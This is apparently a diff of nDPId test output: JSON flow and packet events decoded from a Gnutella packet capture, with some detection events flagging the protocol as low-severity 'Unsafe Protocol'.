-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":534,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":123,"flow_packet_id":2,"flow_last_seen":75264,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75264,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0gnNAAIAGzTcKAAIPGE6GvMROv5bJBoRLAAAAAIAC+vD3zgAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":120,"flow_packet_id":2,"flow_last_seen":75280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75280,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0cvhAAIAGYVMKAAIPGH8B68RLk7Zj+37vAAAAAIAC+vASugAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":536,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75358,"flow_last_seen":75358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75358,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"73.182.136.42","src_port":50263,"dst_port":27873,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":1,"flow_last_seen":75358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75358,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOZAAIAGV+4KAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} 
-00554{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":537,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75358,"flow_last_seen":75358,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75358,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"95.10.205.67","src_port":50264,"dst_port":48380,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":537,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":1,"flow_last_seen":75358,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75358,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYdAAIAGqOAKAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} -00556{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75359,"flow_last_seen":75359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75359,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"113.255.250.32","src_port":50265,"dst_port":52647,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":1,"flow_last_seen":75359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75359,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsVAAIAGE9AKAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} -00555{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":539,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":75359,"flow_last_seen":75359,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":75359,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"219.70.175.103","src_port":50266,"dst_port":4315,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":539,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":1,"flow_last_seen":75359,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":75359,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DLlAAIAGV04KAAIP20avZ8RaENsT5fMFAAAAAIAC+vABQgAAAgQFtAEDAwgBAQQC"} -00447{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":540,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":2,"flow_last_seen":75482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":75482,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsAvIAAEAGpZCcOSoCCgACD4LExFUAh74BMu52DGAS\/\/8XLwAAAgQFtA=="} 
-00437{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":541,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_packet_id":3,"flow_last_seen":75482,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":75482,"pkt":"UlQAEjUCCAAn5uVZCABFAAAoZAVAAIAGxIAKAAIPnDkqAsRVgsQy7nYMAIe+AlAQ+vAz+wAA"} -00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":542,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":148,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":74328,"flow_last_seen":75501,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":597,"flow_tot_l4_payload_len":597,"flow_avg_l4_payload_len":149,"midstream":0,"thread_ts_msec":75501,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"156.57.42.2","src_port":50261,"dst_port":33476,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00438{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":2,"flow_last_seen":75731,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":75731,"pkt":"CAAn5uVZUlQAEjUCCABFAAAoAvQAAP8GIh\/bRq9nCgACDxDbxFoAAAAAE+XzBlAUAAA88gAA"} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":65,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UtJAAIAGDgUKAAIPTn0\/YcQwGMq9KdLlAAAAAIAC+vBtKAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0R05AAIAGN+MKAAIPdqf43MQv9oQzn2SqAAAAAIAC+vCljgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":62,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0faNAAIAGiKQKAAIPO2itBcQtwyRMUgplAAAAAIAC+vChmQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":3,"flow_last_seen":76122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+zhAAIAGNBcKAAIPbdJRk8QxYOCX52ZFAAAAAIAC+vCFbAAAAgQFtAEDAwgBAQQC"} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":153,"flow_packet_id":3,"flow_last_seen":76233,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76233,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DLpAAIAGV00KAAIP20avZ8RaENsT5fMFAAAAAIAC+vABQgAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":144,"flow_packet_id":2,"flow_last_seen":76326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0+G1AAIAG6ukKAAIP20YwF8RRC+6AEyaiAAAAAIAC+vDlvQAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":142,"flow_packet_id":2,"flow_last_seen":76326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA00EJAAIAGLmEKAAIPJOzLJcRPy8UyAvKaAAAAAIAC+vDDTAAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":145,"flow_packet_id":2,"flow_last_seen":76326,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":76326,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0hYdAAIAGFfcKAAIPemTY0sRSG7mAD45dAAAAAIAC+vAmYQAAAgQFtAEDAwgBAQQC"} 
-00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":555,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":3,"flow_last_seen":77122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0K4pAAIAGtdYKAAIPb\/adXsQzx+daqkeOAAAAAIAC+vAsaAAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":556,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":77122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0vG5AAIAGN8cKAAIPAST5W8Q1\/ZgxDGGiAAAAAIAC+vAZFAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":557,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":77122,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77122,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0BKJAAIAGOesKAAIPSQNnJcQ2Q5DEXLK5AAAAAIAC+vA5CwAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":559,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":3,"flow_last_seen":77138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77138,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0ZZtAAIAGsgYKAAIPTESKz8Q3sBfW5xLuAAAAAIAC+vAy2AAAAgQFtAEDAwgBAQQC"} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":560,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":147,"flow_packet_id":2,"flow_last_seen":77329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":77329,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xdNAAIAG7kAKAAIPcf\/IocRUyMI6N6PeAAAAAIAC+vDCQgAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":562,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":3,"flow_last_seen":78169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78169,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0VP5AAIAGOukKAAIPQr0cEcQ6P42S8gLxAAAAAIAC+vBvlwAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":563,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":3,"flow_last_seen":78169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78169,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01LZAAIAGCWYKAAIPAaMO9sQ5MjZr2Fv\/AAAAAIAC+vCZMAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":564,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":78,"flow_packet_id":3,"flow_last_seen":78169,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78169,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0lylAAIAGNGEKAAIPWHvKr8Q9lBZfEvXQAAAAAIAC+vCXrgAAAgQFtAEDAwgBAQQC"} 
-00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":565,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":151,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0GYhAAIAGqN8KAAIPXwrNQ8RYvPy3IUp\/AAAAAIAC+vC4zAAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":566,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":150,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0xOdAAIAGV+0KAAIPSbaIKsRXbOGIdOVZAAAAAIAC+vD3KAAAAgQFtAEDAwgBAQQC"} -00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":567,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":152,"flow_packet_id":2,"flow_last_seen":78374,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":78374,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bsZAAIAGE88KAAIPcf\/6IMRZzacG03PuAAAAAIAC+vDvLQAAAgQFtAEDAwgBAQQC"} -00752{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":570,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":63001,"flow_last_seen":78517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":599,"flow_tot_l4_payload_len":599,"flow_avg_l4_payload_len":99,"midstream":0,"thread_ts_msec":78517,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"86.129.196.84","src_port":50198,"dst_port":9915,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": 
{"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":577,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":79,"flow_packet_id":3,"flow_last_seen":79200,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79200,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0KchAAIAGHhYKAAIPfNop\/cQ+5wgF3IcnAAAAAIAC+vCI7gAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":578,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":84,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0UW1AAIAGasEKAAIPsIqB\/MRDbToYK0huAAAAAIAC+vCjcgAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":579,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":80,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA01kRAAIAGdAUKAAIPcGk0AsQ\/GPASVmSCAAAAAIAC+vBvnQAAAgQFtAEDAwgBAQQC"} -00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":580,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":82,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0A+BAAIAG2\/IKAAIPYhKs0MRB9sQLj4LfAAAAAIAC+vAPuQAAAgQFtAEDAwgBAQQC"} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":581,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":83,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0LJxAAIAGiMMKAAIPbdLLg8RCGMrxPNpbAAAAAIAC+vCGFQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":582,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":81,"flow_packet_id":3,"flow_last_seen":79201,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":79201,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0RnFAAIAGeL8KAAIPJO0KmMRAUy2fhJtvAAAAAIAC+vDmKQAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":583,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":3,"flow_last_seen":80232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":80232,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Dd9AAIAGwQIKAAIPQh7dtcRHyWh8xjFMAAAAAIAC+vAMegAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":584,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":3,"flow_last_seen":80232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":80232,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0Iw1AAIAGfuAKAAIPUAf8wMRGsnV8RDFlAAAAAIAC+vD24gAAAgQFtAEDAwgBAQQC"} 
-00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":585,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":89,"flow_packet_id":3,"flow_last_seen":80232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":80232,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0c0RAAIAGinwKAAIPvD00t8RE+erRmdziAAAAAIAC+vAKcAAAAgQFtAEDAwgBAQQC"} -00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":586,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":90,"flow_packet_id":3,"flow_last_seen":80232,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":80232,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0I3VAAIAGoEwKAAIPST7htcRFtvuqIJp6AAAAAIAC+vB9QAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":493,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":3,"flow_last_seen":74092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0pXBAAIAGEbUKAAIPJOoSpsQi79zHbZnNAAAAAIAC+vAbRgAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":494,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":74092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0q81AAIAGVuQKAAIPd+10FsQgIevuSsSrAAAAAIAC+vDjCgAAAgQFtAEDAwgBAQQC"} 
+00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":495,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":74092,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74092,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0DWxAAIAG8swKAAIPVXWZB8Qlw9oAc\/5TAAAAAIAC+vDyzAAAAgQFtAEDAwgBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":496,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":74093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0NVxAAIAG3h8KAAIPXxF8KMQkGnhkTfi6AAAAAIAC+vBRMgAAAgQFtAEDAwgBAQQC"} +00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":497,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":74093,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":74093,"pkt":"UlQAEjUCCAAn5uVZCABFAAA02YJAAIAG1DcKAAIPcfzO\/sQhwbNg4z+5AAAAAIAC+vAApAAAAgQFtAEDAwgBAQQC"} 